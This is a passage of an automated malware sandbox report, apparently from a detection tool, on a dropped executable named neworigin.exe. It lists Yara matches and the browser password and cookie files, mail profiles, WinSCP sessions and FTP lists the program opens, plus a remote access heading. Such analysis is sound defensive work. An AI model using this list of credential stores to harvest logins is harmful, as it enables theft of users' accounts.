Source: Yara match File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED